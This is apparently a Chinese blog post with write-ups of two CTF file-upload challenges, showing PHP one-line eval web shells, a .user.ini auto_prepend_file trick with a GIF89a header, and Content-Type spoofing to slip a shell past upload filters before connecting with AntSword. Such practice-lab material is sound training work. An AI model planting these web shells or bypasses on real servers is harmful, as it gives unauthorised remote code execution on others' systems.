【CTF解题】攻防世界Web篇
2022-10-19 / 0 评论 / 395 阅读 / 43 点赞

【CTF解题】攻防世界Web篇

发光的神
2022-10-19 / 0 评论 / 395 阅读 / 正在检测是否收录...

easyupload解题

题目难度:1

l9f4gv9h.png

1.题目名就是简单的上传,一开始我以为什么过滤都没有,直接上传一句话木马试试。

l9f4prmy.png

2.将一句话木马改成图片格式,上传后修改文件后缀绕过过滤,结果失败了再换种方式试试。

l9f45ooh.png

// .user.ini
GIF89a                  
auto_prepend_file=a.jpg

// 一句话
GIF89a 
<?=eval($_REQUEST['cmd']);?>

3、.htaccess是伪静态环境配置文件用于lamp,.user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。
目的是防止跨目录访问和文件跨目录读取,配置放在根目录.user.ini,auto_prepend_file的作用是在页面顶部加载文件,上传.user.ini 然后内容写auto_prepend_file=a.jpg,GIF89a也写进去这是gif的文件头,写进去是为了欺骗。

l9f5trqm.png

3.先上传.user.ini,把请求头上的文件类型修改成,image/jpg伪装成图片,好的上传成功了。

l9f9i40q.png

l9f9h763.png

4.一句话木马也上传成功了,再访问upload目录下a.jpg,发现图片是有的,再访问index.php看到一堆乱码里面有GIF89a,这个是就是连接木马的关键网址。

l9fepnvx.png

5.输入网址和一句话木马,开始连接开始找flag。

l9fes161.png

l9fes7p9.png

6.找到了在根目录下,提交下看看是不是对的。

upload1解题

题目难度:2

l92fmsk7.png

1.题目upload就带有上传的提示,先上传个木马试试,一般前端都有文件类型过滤,也有可能后端有,题目嘛不会那么坑的。

l92fqi1c.png
2.一般敏感的可文件都上传不了,这里我用一句话和图片合成了,改后缀也是可以的,就决定是你了,上吧,朱菜!!

<?php @eval($_POST['zc']);?>

l92g93kz.png

3.上传成功之后,就可以开始连接了,上蚁剑能连上就行工具都差不多。

l92gjzl4.png

l92gmwcc.png

l92gnxlb.png

l9fetufz.png

43

评论 (0)

取消
0:00